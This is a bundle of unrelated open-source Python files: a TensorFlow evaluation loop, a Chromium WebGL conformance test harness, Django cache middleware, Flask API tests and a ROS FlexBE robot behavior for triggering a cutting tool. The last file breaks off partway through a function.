    saver = tf.train.Saver()
    # Summary machinery for TensorBoard output.
    summary_op = tf.summary.merge_all()
    summary_writer = tf.summary.FileWriter(eval_dir)
    graph.finalize()
    # Evaluate once per eval_interval_secs, sleeping off any remainder of
    # the interval after each run.
    while True:
      cycle_start = time.time()
      tf.logging.info("Starting evaluation at " + time.strftime(
          "%Y-%m-%d-%H:%M:%S", time.localtime()))
      run_once(model, saver, summary_writer, summary_op)
      remaining = cycle_start + FLAGS.eval_interval_secs - time.time()
      if remaining > 0:
        time.sleep(remaining)
def main(unused_argv):
  """Validates the required flags, then starts the evaluation loop."""
  required_flags = [(FLAGS.input_file_pattern, "--input_file_pattern"),
                    (FLAGS.checkpoint_dir, "--checkpoint_dir"),
                    (FLAGS.eval_dir, "--eval_dir")]
  for flag_value, flag_name in required_flags:
    assert flag_value, "%s is required" % flag_name
  run()
if __name__ == "__main__":
tf.app.run()
| MeteorKepler/RICGA | ricga/evaluate.py | Python | apache-2.0 | 7,364 |
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import json
import os
import sys
import webgl_conformance_expectations
from telemetry import test as test_module
from telemetry.core import util
from telemetry.page import page_set
from telemetry.page import page_test
# Location of the checked-in Khronos WebGL conformance suite.
conformance_path = os.path.join(
    util.GetChromiumSrcDir(), 'third_party', 'webgl_conformance')

# JavaScript injected into each conformance page before it runs.  It collects
# pass/fail state and messages, and exposes them to the Python side through
# window.webglTestHarness (read back via tab.EvaluateJavaScript).
conformance_harness_script = r"""
var testHarness = {};
testHarness._allTestSucceeded = true;
testHarness._messages = '';
testHarness._failures = 0;
testHarness._finished = false;
testHarness.reportResults = function(success, msg) {
testHarness._allTestSucceeded = testHarness._allTestSucceeded && !!success;
if(!success) {
testHarness._failures++;
if(msg) {
testHarness._messages += msg + "\n";
}
}
};
testHarness.notifyFinished = function() {
testHarness._finished = true;
};
testHarness.navigateToPage = function(src) {
var testFrame = document.getElementById("test-frame");
testFrame.src = src;
};
window.webglTestHarness = testHarness;
window.parent.webglTestHarness = testHarness;
console.log("Harness injected.");
"""
def _DidWebGLTestSucceed(tab):
return tab.EvaluateJavaScript('webglTestHarness._allTestSucceeded')
def _WebGLTestMessages(tab):
return tab.EvaluateJavaScript('webglTestHarness._messages')
class WebglConformanceValidator(page_test.PageTest):
  """Fails a page unless the injected harness reported overall success."""

  def __init__(self):
    super(WebglConformanceValidator, self).__init__('ValidatePage')

  def ValidatePage(self, page, tab, results):
    # On failure, surface the harness' accumulated messages to the runner.
    if _DidWebGLTestSucceed(tab):
      return
    raise page_test.Failure(_WebGLTestMessages(tab))

  def CustomizeBrowserOptions(self, options):
    # Browser flags required to run WebGL conformance content.
    for arg in ('--enable-webgl',
                '--disable-gesture-requirement-for-media-playback'):
      options.AppendExtraBrowserArg(arg)
class WebglConformance(test_module.Test):
  """Conformance with Khronos WebGL Conformance Tests"""
  enabled = False
  test = WebglConformanceValidator

  def CreatePageSet(self, options):
    """Builds a page set with one entry per conformance test page."""
    tests = self._ParseTests('00_test_list.txt', '1.0.1')

    page_set_dict = {
      'description': 'Executes WebGL conformance tests',
      'user_agent_type': 'desktop',
      'serving_dirs': [ '' ],
      'pages': []
    }

    pages = page_set_dict['pages']
    for test in tests:
      pages.append({
        'url': 'file:///' + test,
        'script_to_evaluate_on_commit': conformance_harness_script,
        'wait_for_javascript_expression': 'webglTestHarness._finished'
      })

    return page_set.PageSet.FromDict(page_set_dict, conformance_path)

  def CreateExpectations(self, page_set):
    return webgl_conformance_expectations.WebGLConformanceExpectations()

  @staticmethod
  def _VersionTuple(version_string):
    """Parses a dotted version string ('1.0.12') into an int tuple."""
    return tuple(int(part) for part in version_string.split('.'))

  @staticmethod
  def _ParseTests(path, version=None):
    """Recursively parses a Khronos test list file into a list of test paths.

    Lines may carry a '--min-version X.Y.Z' flag; such tests are skipped when
    the requested version is lower.  Versions are compared numerically,
    component by component: the previous plain string comparison was wrong
    for multi-digit components (e.g. '1.0.10' < '1.0.2' as strings).
    """
    test_paths = []
    current_dir = os.path.dirname(path)
    full_path = os.path.normpath(os.path.join(conformance_path, path))

    if not os.path.exists(full_path):
      raise Exception('The WebGL conformance test path specified ' +
        'does not exist: ' + full_path)

    with open(full_path, 'r') as f:
      for line in f:
        line = line.strip()

        # Skip blank lines and comments.
        if not line:
          continue
        if line.startswith('//') or line.startswith('#'):
          continue

        line_tokens = line.split(' ')

        # Scan any flags that precede the test name.
        i = 0
        min_version = None
        while i < len(line_tokens):
          token = line_tokens[i]
          if token == '--min-version':
            i += 1
            min_version = line_tokens[i]
          i += 1

        # Bugfix: compare versions numerically, not lexicographically.
        if (version and min_version and
            WebglConformance._VersionTuple(version) <
            WebglConformance._VersionTuple(min_version)):
          continue

        test_name = line_tokens[-1]

        # A '.txt' entry is a nested test list to be parsed recursively.
        if '.txt' in test_name:
          include_path = os.path.join(current_dir, test_name)
          test_paths += WebglConformance._ParseTests(
            include_path, version)
        else:
          test = os.path.join(current_dir, test_name)
          test_paths.append(test)

    return test_paths
| aospx-kitkat/platform_external_chromium_org | content/test/gpu/gpu_tests/webgl_conformance.py | Python | bsd-3-clause | 4,067 |
"""
Cache middleware. If enabled, each Django-powered page will be cached based on
URL. The canonical way to enable cache middleware is to set
``UpdateCacheMiddleware`` as your first piece of middleware, and
``FetchFromCacheMiddleware`` as the last::
MIDDLEWARE_CLASSES = [
'django.middleware.cache.UpdateCacheMiddleware',
...
'django.middleware.cache.FetchFromCacheMiddleware'
]
This is counter-intuitive, but correct: ``UpdateCacheMiddleware`` needs to run
last during the response phase, which processes middleware bottom-up;
``FetchFromCacheMiddleware`` needs to run last during the request phase, which
processes middleware top-down.
The single-class ``CacheMiddleware`` can be used for some simple sites.
However, if any other piece of middleware needs to affect the cache key, you'll
need to use the two-part ``UpdateCacheMiddleware`` and
``FetchFromCacheMiddleware``. This'll most often happen when you're using
Django's ``LocaleMiddleware``.
More details about how the caching works:
* Only GET or HEAD-requests with status code 200 are cached.
* The number of seconds each page is stored for is set by the "max-age" section
of the response's "Cache-Control" header, falling back to the
CACHE_MIDDLEWARE_SECONDS setting if the section was not found.
* If CACHE_MIDDLEWARE_ANONYMOUS_ONLY is set to True, only anonymous requests
(i.e., those not made by a logged-in user) will be cached. This is a simple
and effective way of avoiding the caching of the Django admin (and any other
user-specific content).
* This middleware expects that a HEAD request is answered with exactly the
  same response headers as the corresponding GET request.
* When a hit occurs, a shallow copy of the original response object is returned
from process_request.
* Pages will be cached based on the contents of the request headers listed in
the response's "Vary" header.
* This middleware also sets ETag, Last-Modified, Expires and Cache-Control
headers on the response object.
"""
from django.conf import settings
from django.core.cache import get_cache, DEFAULT_CACHE_ALIAS
from django.utils.cache import get_cache_key, learn_cache_key, patch_response_headers, get_max_age
class UpdateCacheMiddleware(object):
    """
    Response-phase cache middleware that updates the cache if the response is
    cacheable.

    Must be used as part of the two-part update/fetch cache middleware.
    UpdateCacheMiddleware must be the first piece of middleware in
    MIDDLEWARE_CLASSES so that it'll get called last during the response phase.
    """
    def __init__(self):
        self.cache_timeout = settings.CACHE_MIDDLEWARE_SECONDS
        self.key_prefix = settings.CACHE_MIDDLEWARE_KEY_PREFIX
        self.cache_anonymous_only = getattr(settings, 'CACHE_MIDDLEWARE_ANONYMOUS_ONLY', False)
        self.cache_alias = settings.CACHE_MIDDLEWARE_ALIAS
        self.cache = get_cache(self.cache_alias)

    def _session_accessed(self, request):
        # A missing session attribute means the session middleware is not
        # installed; treat that the same as "not accessed".
        try:
            return request.session.accessed
        except AttributeError:
            return False

    def _should_update_cache(self, request, response):
        """Returns True if this response should be written to the cache."""
        if not hasattr(request, '_cache_update_cache') or not request._cache_update_cache:
            return False
        # If the session has not been accessed otherwise, we don't want to
        # cause it to be accessed here. If it hasn't been accessed, then the
        # user's logged-in status has not affected the response anyway.
        if self.cache_anonymous_only and self._session_accessed(request):
            assert hasattr(request, 'user'), "The Django cache middleware with CACHE_MIDDLEWARE_ANONYMOUS_ONLY=True requires authentication middleware to be installed. Edit your MIDDLEWARE_CLASSES setting to insert 'django.contrib.auth.middleware.AuthenticationMiddleware' before the CacheMiddleware."
            if request.user.is_authenticated():
                # Don't cache user-variable requests from authenticated users.
                return False
        return True

    def process_response(self, request, response):
        """Sets the cache, if needed."""
        if not self._should_update_cache(request, response):
            # We don't need to update the cache, just return.
            return response
        # Only successful responses are cached.
        if response.status_code != 200:
            return response
        # Try to get the timeout from the "max-age" section of the "Cache-
        # Control" header before reverting to using the default cache_timeout
        # length.
        timeout = get_max_age(response)
        if timeout is None:
            timeout = self.cache_timeout
        elif timeout == 0:
            # max-age was set to 0, don't bother caching.
            return response
        patch_response_headers(response, timeout)
        if timeout:
            cache_key = learn_cache_key(request, response, timeout, self.key_prefix, cache=self.cache)
            if hasattr(response, 'render') and callable(response.render):
                # TemplateResponse: defer caching until the content exists.
                response.add_post_render_callback(
                    lambda r: self.cache.set(cache_key, r, timeout)
                )
            else:
                self.cache.set(cache_key, response, timeout)
        return response
class FetchFromCacheMiddleware(object):
    """
    Request-phase cache middleware that fetches a page from the cache.

    Must be used as part of the two-part update/fetch cache middleware.
    FetchFromCacheMiddleware must be the last piece of middleware in
    MIDDLEWARE_CLASSES so that it'll get called last during the request phase.
    """
    def __init__(self):
        self.cache_timeout = settings.CACHE_MIDDLEWARE_SECONDS
        self.key_prefix = settings.CACHE_MIDDLEWARE_KEY_PREFIX
        self.cache_anonymous_only = getattr(settings, 'CACHE_MIDDLEWARE_ANONYMOUS_ONLY', False)
        self.cache_alias = settings.CACHE_MIDDLEWARE_ALIAS
        self.cache = get_cache(self.cache_alias)

    def process_request(self, request):
        """
        Checks whether the page is already cached and returns the cached
        version if available.
        """
        # Only safe methods are cacheable.
        if request.method not in ('GET', 'HEAD'):
            request._cache_update_cache = False
            return None # Don't bother checking the cache.

        # try and get the cached GET response
        cache_key = get_cache_key(request, self.key_prefix, 'GET', cache=self.cache)
        if cache_key is None:
            request._cache_update_cache = True
            return None # No cache information available, need to rebuild.
        response = self.cache.get(cache_key, None)

        # if it wasn't found and we are looking for a HEAD, try looking just for that
        if response is None and request.method == 'HEAD':
            cache_key = get_cache_key(request, self.key_prefix, 'HEAD', cache=self.cache)
            response = self.cache.get(cache_key, None)

        if response is None:
            request._cache_update_cache = True
            return None # No cache information available, need to rebuild.

        # hit, return cached response
        request._cache_update_cache = False
        return response
class CacheMiddleware(UpdateCacheMiddleware, FetchFromCacheMiddleware):
    """
    Cache middleware that provides basic behavior for many simple sites.

    Also used as the hook point for the cache decorator, which is generated
    using the decorator-from-middleware utility.
    """
    def __init__(self, cache_timeout=None, cache_anonymous_only=None, **kwargs):
        # We need to differentiate between "provided, but using default value",
        # and "not provided". If the value is provided using a default, then
        # we fall back to system defaults. If it is not provided at all,
        # we need to use middleware defaults.
        # The KeyError branches below implement that: a key absent from
        # **kwargs means "not provided at all".
        cache_kwargs = {}

        try:
            # key_prefix explicitly passed (possibly None, meaning "use '' ").
            self.key_prefix = kwargs['key_prefix']
            if self.key_prefix is not None:
                cache_kwargs['KEY_PREFIX'] = self.key_prefix
            else:
                self.key_prefix = ''
        except KeyError:
            # Not provided: fall back to the project-wide setting.
            self.key_prefix = settings.CACHE_MIDDLEWARE_KEY_PREFIX
            cache_kwargs['KEY_PREFIX'] = self.key_prefix

        try:
            # cache_alias explicitly passed (None means the default alias).
            self.cache_alias = kwargs['cache_alias']
            if self.cache_alias is None:
                self.cache_alias = DEFAULT_CACHE_ALIAS
            if cache_timeout is not None:
                cache_kwargs['TIMEOUT'] = cache_timeout
        except KeyError:
            # Not provided: use the configured middleware alias and timeout.
            self.cache_alias = settings.CACHE_MIDDLEWARE_ALIAS
            if cache_timeout is None:
                cache_kwargs['TIMEOUT'] = settings.CACHE_MIDDLEWARE_SECONDS
            else:
                cache_kwargs['TIMEOUT'] = cache_timeout

        if cache_anonymous_only is None:
            self.cache_anonymous_only = getattr(settings, 'CACHE_MIDDLEWARE_ANONYMOUS_ONLY', False)
        else:
            self.cache_anonymous_only = cache_anonymous_only

        self.cache = get_cache(self.cache_alias, **cache_kwargs)
        # The effective timeout comes from the cache backend configured above.
        self.cache_timeout = self.cache.default_timeout
| ychen820/microblog | y/google-cloud-sdk/platform/google_appengine/lib/django-1.3/django/middleware/cache.py | Python | bsd-3-clause | 9,078 |
import operator
from flask import url_for
import pytest
from talkoohakemisto import serializers
from talkoohakemisto.extensions import db
from tests import factories
@pytest.mark.usefixtures('request_ctx', 'database')
class TestMunicipalityIndex(object):
    """The index endpoint lists all municipalities sorted by name."""

    @pytest.fixture
    def municipalities(self):
        created = [factories.MunicipalityFactory() for _ in range(2)]
        db.session.commit()
        return created

    @pytest.fixture
    def response(self, client, municipalities):
        return client.get(url_for('municipality.index'))

    def test_url(self):
        assert url_for('municipality.index') == '/municipalities'

    def test_returns_200(self, response):
        assert response.status_code == 200

    def test_response_has_proper_content_type(self, response):
        assert response.mimetype == 'application/vnd.api+json'

    def test_returns_municipalities_as_json(self, response, municipalities):
        expected = serializers.MunicipalitySerializer(
            sorted(municipalities, key=lambda m: m.name),
            many=True
        ).data
        assert response.json == {'municipalities': expected}
@pytest.mark.usefixtures('request_ctx', 'database')
class TestMunicipalityGetSingle(object):
    """Fetching a single municipality by its code returns it as JSON."""

    @pytest.fixture
    def municipality(self):
        created = factories.MunicipalityFactory()
        db.session.commit()
        return created

    @pytest.fixture
    def response(self, client, municipality):
        return client.get(url_for('municipality.get', id=municipality.code))

    def test_url(self):
        assert url_for('municipality.get', id=123) == '/municipalities/123'

    def test_returns_200(self, response):
        assert response.status_code == 200

    def test_response_has_proper_content_type(self, response):
        assert response.mimetype == 'application/vnd.api+json'

    def test_returns_municipality_as_json(self, response, municipality):
        expected = serializers.MunicipalitySerializer(
            [municipality],
            many=True
        ).data
        assert response.json == {'municipalities': expected}
@pytest.mark.usefixtures('request_ctx', 'database')
class TestMunicipalityGetSingleWhenNotFound(object):
    """An unknown municipality id yields a JSON 404 error."""

    @pytest.fixture
    def response(self, client):
        return client.get(url_for('municipality.get', id=12345))

    def test_returns_404(self, response):
        assert response.status_code == 404

    def test_response_has_proper_content_type(self, response):
        assert response.mimetype == 'application/vnd.api+json'

    def test_returns_error_as_json(self, response):
        expected = {'message': 'Not found'}
        assert response.json == expected
@pytest.mark.usefixtures('request_ctx', 'database')
class TestMunicipalityGetSingleWithNonIntegerID(object):
    """A non-numeric id does not match the route and yields a JSON 404."""

    @pytest.fixture
    def response(self, client):
        return client.get('/municipalities/foobar')

    def test_returns_404(self, response):
        assert response.status_code == 404

    def test_response_has_proper_content_type(self, response):
        assert response.mimetype == 'application/vnd.api+json'

    def test_returns_error_as_json(self, response):
        expected = {'message': 'Not found'}
        assert response.json == expected
| talkoopaiva/talkoohakemisto-api | tests/views/test_municipalities.py | Python | mit | 3,372 |
#!/usr/bin/env python
###########################################################
# WARNING: Generated code! #
# ************************** #
# Manual changes may get lost if file is generated again. #
# Only code inside the [MANUAL] tags will be kept. #
###########################################################
import roslib; roslib.load_manifest('vigir_behavior_trigger_cutting_tool')
from flexbe_core import Behavior, Autonomy, OperatableStateMachine, Logger
from flexbe_states.calculation_state import CalculationState
from vigir_flexbe_states.plan_endeffector_pose_state import PlanEndeffectorPoseState
from vigir_flexbe_states.execute_trajectory_msg_state import ExecuteTrajectoryMsgState
from flexbe_states.decision_state import DecisionState
from vigir_flexbe_states.plan_endeffector_cartesian_waypoints_state import PlanEndeffectorCartesianWaypointsState
from flexbe_states.operator_decision_state import OperatorDecisionState
from vigir_flexbe_states.moveit_predefined_pose_state import MoveitPredefinedPoseState
from vigir_flexbe_states.get_wrist_pose_state import GetWristPoseState
from vigir_flexbe_states.get_pose_in_frame_state import GetPoseInFrameState
from flexbe_states.log_state import LogState
from flexbe_states.flexible_calculation_state import FlexibleCalculationState
# Additional imports can be added inside the following tags
# [MANUAL_IMPORT]
import rospy
import math
import copy
from geometry_msgs.msg import PoseStamped, Pose, Point, Quaternion
from std_msgs.msg import Header
from flexbe_core.proxy import ProxyPublisher
# [/MANUAL_IMPORT]
'''
Created on Tue May 12 2015
@author: Dorothea Koert, Philipp Schillinger
'''
class TriggerCuttingToolSM(Behavior):
'''
Switch the cutting tool on or off.
'''
def __init__(self):
    """Register behavior metadata, parameters and debug publishers."""
    super(TriggerCuttingToolSM, self).__init__()
    self.name = 'Trigger Cutting Tool'

    # parameters of this behavior
    self.add_parameter('hand_side', 'left')

    # references to used behaviors

    # Additional initialization code can be added inside the following tags
    # [MANUAL_INIT]
    # Spiral scaling factor for the pre-poke search pattern; overwritten
    # from create() with the generated scaling_factor constant.
    self._scaling_factor = 0
    # Debug publishers for the pre-poke / poke poses (topic names look like
    # placeholders -- presumably for RViz inspection; TODO confirm).
    self._pub1 = rospy.Publisher('/bla1', PoseStamped)
    self._pub2 = rospy.Publisher('/bla2', PoseStamped)
    # [/MANUAL_INIT]
# Behavior comments:
# O 453 228
# Start spiral again with its origin at the current position
# ! 3 256
# Skip predefined pre_poke_pose for now
def create(self):
    """Assemble and return the 'Trigger Cutting Tool' state machine.

    NOTE: generated code -- comments added outside the [MANUAL] tags may be
    lost if the behavior is regenerated from the FlexBE editor.
    """
    number_of_points = 9  # NOTE(review): unused in the current graph
    scaling_factor = 2 # for spiral pattern
    attempts_per_point = 3
    arm_controller = ExecuteTrajectoryMsgState.CONTROLLER_LEFT_ARM if self.hand_side == 'left' else ExecuteTrajectoryMsgState.CONTROLLER_RIGHT_ARM
    poking_stick_frame = self.hand_side + '_poking_stick'
    # x:183 y:40, x:283 y:290
    _state_machine = OperatableStateMachine(outcomes=['finished', 'failed'])
    _state_machine.userdata.none = None
    _state_machine.userdata.hand_side = self.hand_side

    # Additional creation code can be added inside the following tags
    # [MANUAL_CREATE]
    self._scaling_factor = scaling_factor
    # [/MANUAL_CREATE]

    # Sub-state machine: derive poke / pre-poke waypoint lists from the
    # current endeffector pose expressed in the poking stick frame.
    # x:637 y:484, x:391 y:152
    _sm_calculate_poke_poses_0 = OperatableStateMachine(outcomes=['finished', 'failed'], input_keys=['hand_side'], output_keys=['poke_waypoints', 'poke_frame_id', 'pre_poke_waypoints', 'pre_poke_frame_id'])

    with _sm_calculate_poke_poses_0:
        # x:63 y:78
        OperatableStateMachine.add('Get_Current_Endeffector_Pose',
                GetWristPoseState(),
                transitions={'done': 'Transform_Endeffector_Pose', 'failed': 'failed'},
                autonomy={'done': Autonomy.Low, 'failed': Autonomy.Low},
                remapping={'hand_side': 'hand_side', 'wrist_pose': 'wrist_pose'})

        # x:67 y:178
        OperatableStateMachine.add('Transform_Endeffector_Pose',
                GetPoseInFrameState(target_frame=poking_stick_frame),
                transitions={'done': 'Translate_To_Poke_Pose', 'failed': 'failed'},
                autonomy={'done': Autonomy.Off, 'failed': Autonomy.Off},
                remapping={'pose_in': 'wrist_pose', 'pose_out': 'pre_poke_pose'})

        # x:77 y:278
        OperatableStateMachine.add('Translate_To_Poke_Pose',
                CalculationState(calculation=self.calc_poke_pose),
                transitions={'done': 'Pre_Poke_Pose_To_Waypoints'},
                autonomy={'done': Autonomy.Off},
                remapping={'input_value': 'pre_poke_pose', 'output_value': 'poke_pose'})

        # x:324 y:378
        OperatableStateMachine.add('Poke_Pose_To_Waypoints',
                CalculationState(calculation=lambda x: [x.pose]),
                transitions={'done': 'Set_Poke_Waypoints_Frame'},
                autonomy={'done': Autonomy.Off},
                remapping={'input_value': 'poke_pose', 'output_value': 'poke_waypoints'})

        # x:569 y:378
        OperatableStateMachine.add('Set_Poke_Waypoints_Frame',
                CalculationState(calculation=lambda x: x.header.frame_id),
                transitions={'done': 'finished'},
                autonomy={'done': Autonomy.Off},
                remapping={'input_value': 'poke_pose', 'output_value': 'poke_frame_id'})

        # x:313 y:278
        OperatableStateMachine.add('Pre_Poke_Pose_To_Waypoints',
                CalculationState(calculation=lambda x: [x.pose]),
                transitions={'done': 'Set_Pre_Poke_Waypoints_Frame'},
                autonomy={'done': Autonomy.Off},
                remapping={'input_value': 'pre_poke_pose', 'output_value': 'pre_poke_waypoints'})

        # x:558 y:278
        OperatableStateMachine.add('Set_Pre_Poke_Waypoints_Frame',
                CalculationState(calculation=lambda x: x.header.frame_id),
                transitions={'done': 'Poke_Pose_To_Waypoints'},
                autonomy={'done': Autonomy.Off},
                remapping={'input_value': 'pre_poke_pose', 'output_value': 'pre_poke_frame_id'})

    # Sub-state machine: repeatedly move between the pre-poke and poke poses
    # (up to attempts_per_point times) to trigger the tool's switch.
    # x:433 y:40, x:441 y:253
    _sm_poke_1 = OperatableStateMachine(outcomes=['finished', 'failed'], input_keys=['none', 'hand_side', 'poke_waypoints', 'poke_frame_id', 'pre_poke_waypoints', 'pre_poke_frame_id'])

    with _sm_poke_1:
        # x:49 y:78
        OperatableStateMachine.add('Init_Inner_Index',
                CalculationState(calculation=lambda x: 0),
                transitions={'done': 'Plan_To_Poke_Pose'},
                autonomy={'done': Autonomy.Off},
                remapping={'input_value': 'none', 'output_value': 'poking_index'})

        # x:76 y:328
        OperatableStateMachine.add('Move_To_Poke_Pose',
                ExecuteTrajectoryMsgState(controller=arm_controller),
                transitions={'done': 'Plan_To_Pre_Poke_Pose', 'failed': 'failed'},
                autonomy={'done': Autonomy.Low, 'failed': Autonomy.High},
                remapping={'joint_trajectory': 'joint_trajectory'})

        # x:626 y:378
        OperatableStateMachine.add('Move_To_Pre_Poke_Pose',
                ExecuteTrajectoryMsgState(controller=arm_controller),
                transitions={'done': 'Increase_Inner_Index', 'failed': 'failed'},
                autonomy={'done': Autonomy.Low, 'failed': Autonomy.High},
                remapping={'joint_trajectory': 'joint_trajectory'})

        # x:636 y:178
        OperatableStateMachine.add('Increase_Inner_Index',
                CalculationState(calculation=lambda x: x+1),
                transitions={'done': 'Check_Inner_Index'},
                autonomy={'done': Autonomy.Off},
                remapping={'input_value': 'poking_index', 'output_value': 'poking_index'})

        # x:392 y:178
        OperatableStateMachine.add('Check_Inner_Index',
                DecisionState(outcomes=['continue','finished'], conditions=lambda x: 'continue' if x<attempts_per_point else 'finished'),
                transitions={'continue': 'Plan_To_Poke_Pose', 'finished': 'finished'},
                autonomy={'continue': Autonomy.Low, 'finished': Autonomy.Low},
                remapping={'input_value': 'poking_index'})

        # x:46 y:178
        OperatableStateMachine.add('Plan_To_Poke_Pose',
                PlanEndeffectorCartesianWaypointsState(ignore_collisions=True, include_torso=False, keep_endeffector_orientation=False, allow_incomplete_plans=True, vel_scaling=0.2, planner_id="RRTConnectkConfigDefault"),
                transitions={'planned': 'Move_To_Poke_Pose', 'incomplete': 'Move_To_Poke_Pose', 'failed': 'failed'},
                autonomy={'planned': Autonomy.Low, 'incomplete': Autonomy.Low, 'failed': Autonomy.High},
                remapping={'waypoints': 'poke_waypoints', 'hand': 'hand_side', 'frame_id': 'poke_frame_id', 'joint_trajectory': 'joint_trajectory', 'plan_fraction': 'plan_fraction'})

        # x:296 y:428
        OperatableStateMachine.add('Plan_To_Pre_Poke_Pose',
                PlanEndeffectorCartesianWaypointsState(ignore_collisions=True, include_torso=False, keep_endeffector_orientation=False, allow_incomplete_plans=True, vel_scaling=0.5, planner_id="RRTConnectkConfigDefault"),
                transitions={'planned': 'Move_To_Pre_Poke_Pose', 'incomplete': 'Move_To_Pre_Poke_Pose', 'failed': 'failed'},
                autonomy={'planned': Autonomy.Low, 'incomplete': Autonomy.Low, 'failed': Autonomy.High},
                remapping={'waypoints': 'pre_poke_waypoints', 'hand': 'hand_side', 'frame_id': 'pre_poke_frame_id', 'joint_trajectory': 'joint_trajectory', 'plan_fraction': 'plan_fraction'})

    with _state_machine:
        # x:51 y:78
        OperatableStateMachine.add('Init_Index',
                CalculationState(calculation=lambda x: 0),
                transitions={'done': 'Move_To_Ready_Pose'},
                autonomy={'done': Autonomy.High},
                remapping={'input_value': 'none', 'output_value': 'attempt_index'})

        # x:29 y:278
        OperatableStateMachine.add('Prepare_Pre_Poke_Pose',
                CalculationState(calculation=self.suggest_pre_poke_pose),
                transitions={'done': 'Plan_To_Pre_Poke_Pose'},
                autonomy={'done': Autonomy.Off},
                remapping={'input_value': 'none', 'output_value': 'pre_poke_pose'})

        # x:28 y:378
        OperatableStateMachine.add('Plan_To_Pre_Poke_Pose',
                PlanEndeffectorPoseState(ignore_collisions=False, include_torso=False, allowed_collisions=[], planner_id="RRTConnectkConfigDefault"),
                transitions={'planned': 'Move_To_Pre_Poke_Pose', 'failed': 'failed'},
                autonomy={'planned': Autonomy.High, 'failed': Autonomy.Low},
                remapping={'target_pose': 'pre_poke_pose', 'hand': 'hand_side', 'joint_trajectory': 'joint_trajectory'})

        # x:26 y:478
        OperatableStateMachine.add('Move_To_Pre_Poke_Pose',
                ExecuteTrajectoryMsgState(controller=arm_controller),
                transitions={'done': 'Adjust_Pre_Poke_Pose', 'failed': 'failed'},
                autonomy={'done': Autonomy.Low, 'failed': Autonomy.High},
                remapping={'joint_trajectory': 'joint_trajectory'})

        # x:344 y:122
        OperatableStateMachine.add('Poke',
                _sm_poke_1,
                transitions={'finished': 'Check_Cutting_Tool_Status', 'failed': 'failed'},
                autonomy={'finished': Autonomy.Inherit, 'failed': Autonomy.Inherit},
                remapping={'none': 'none', 'hand_side': 'hand_side', 'poke_waypoints': 'poke_waypoints', 'poke_frame_id': 'poke_frame_id', 'pre_poke_waypoints': 'pre_poke_waypoints', 'pre_poke_frame_id': 'pre_poke_frame_id'})

        # x:321 y:28
        OperatableStateMachine.add('Check_Cutting_Tool_Status',
                OperatorDecisionState(outcomes=['on', 'off', 'reset_iteration'], hint="Is the cutting tool on?", suggestion=None),
                transitions={'on': 'finished', 'off': 'Increment_Index', 'reset_iteration': 'Reset_Index'},
                autonomy={'on': Autonomy.Full, 'off': Autonomy.Full, 'reset_iteration': Autonomy.Full})

        # x:798 y:28
        OperatableStateMachine.add('Increment_Index',
                CalculationState(calculation=lambda x: x+1),
                transitions={'done': 'Calc_Next_Pre_Poke_Pose'},
                autonomy={'done': Autonomy.High},
                remapping={'input_value': 'attempt_index', 'output_value': 'attempt_index'})

        # x:26 y:178
        OperatableStateMachine.add('Move_To_Ready_Pose',
                MoveitPredefinedPoseState(target_pose=MoveitPredefinedPoseState.POKE_READY_POSE, vel_scaling=0.2, ignore_collisions=False, link_paddings={}),
                transitions={'done': 'Adjust_Pre_Poke_Pose', 'failed': 'failed'},
                autonomy={'done': Autonomy.Low, 'failed': Autonomy.High},
                remapping={'side': 'hand_side'})

        # x:321 y:372
        OperatableStateMachine.add('Calculate_Poke_Poses',
                _sm_calculate_poke_poses_0,
                transitions={'finished': 'Poke', 'failed': 'failed'},
                autonomy={'finished': Autonomy.Inherit, 'failed': Autonomy.Inherit},
                remapping={'hand_side': 'hand_side', 'poke_waypoints': 'poke_waypoints', 'poke_frame_id': 'poke_frame_id', 'pre_poke_waypoints': 'pre_poke_waypoints', 'pre_poke_frame_id': 'pre_poke_frame_id'})

        # x:82 y:578
        OperatableStateMachine.add('Adjust_Pre_Poke_Pose',
                LogState(text="Adjust pose so that the template is in front of the poking stick", severity=Logger.REPORT_HINT),
                transitions={'done': 'Get_Current_Endeffector_Pose'},
                autonomy={'done': Autonomy.Full})

        # x:601 y:178
        OperatableStateMachine.add('Reset_Index',
                CalculationState(calculation=lambda x: 0),
                transitions={'done': 'Get_Current_Endeffector_Pose'},
                autonomy={'done': Autonomy.Off},
                remapping={'input_value': 'attempt_index', 'output_value': 'attempt_index'})

        # x:764 y:278
        OperatableStateMachine.add('Plan_To_Next_Pre_Poke_Pose',
                PlanEndeffectorPoseState(ignore_collisions=False, include_torso=False, allowed_collisions=[], planner_id="RRTConnectkConfigDefault"),
                transitions={'planned': 'Move_To_Next_Pre_Poke_Pose', 'failed': 'failed'},
                autonomy={'planned': Autonomy.High, 'failed': Autonomy.Low},
                remapping={'target_pose': 'pre_poke_pose', 'hand': 'hand_side', 'joint_trajectory': 'joint_trajectory'})

        # x:762 y:378
        OperatableStateMachine.add('Move_To_Next_Pre_Poke_Pose',
                ExecuteTrajectoryMsgState(controller=arm_controller),
                transitions={'done': 'Calculate_Poke_Poses', 'failed': 'failed'},
                autonomy={'done': Autonomy.Low, 'failed': Autonomy.High},
                remapping={'joint_trajectory': 'joint_trajectory'})

        # x:773 y:178
        OperatableStateMachine.add('Calc_Next_Pre_Poke_Pose',
                FlexibleCalculationState(calculation=self.calc_pre_poke_pose, input_keys=['index', 'init_pre_poke_pose']),
                transitions={'done': 'Plan_To_Next_Pre_Poke_Pose'},
                autonomy={'done': Autonomy.Off},
                remapping={'index': 'attempt_index', 'init_pre_poke_pose': 'init_pre_poke_pose', 'output_value': 'pre_poke_pose'})

        # x:563 y:578
        OperatableStateMachine.add('Get_Current_Endeffector_Pose',
                GetWristPoseState(),
                transitions={'done': 'Transform_Endeffector_Pose', 'failed': 'failed'},
                autonomy={'done': Autonomy.Low, 'failed': Autonomy.Low},
                remapping={'hand_side': 'hand_side', 'wrist_pose': 'wrist_pose'})

        # x:317 y:478
        OperatableStateMachine.add('Transform_Endeffector_Pose',
                GetPoseInFrameState(target_frame=poking_stick_frame),
                transitions={'done': 'Calculate_Poke_Poses', 'failed': 'failed'},
                autonomy={'done': Autonomy.Off, 'failed': Autonomy.Off},
                remapping={'pose_in': 'wrist_pose', 'pose_out': 'init_pre_poke_pose'})

    return _state_machine
# Private functions can be added inside the following tags
# [MANUAL_FUNC]
def suggest_pre_poke_pose(self, none):
    """Return a hardcoded pre-poke pose in the side's poking stick frame.

    The unused 'none' argument matches the CalculationState callback
    signature. For sides other than 'left'/'right' only the header is
    filled in (same fall-through behavior as before).
    """
    pose = PoseStamped()
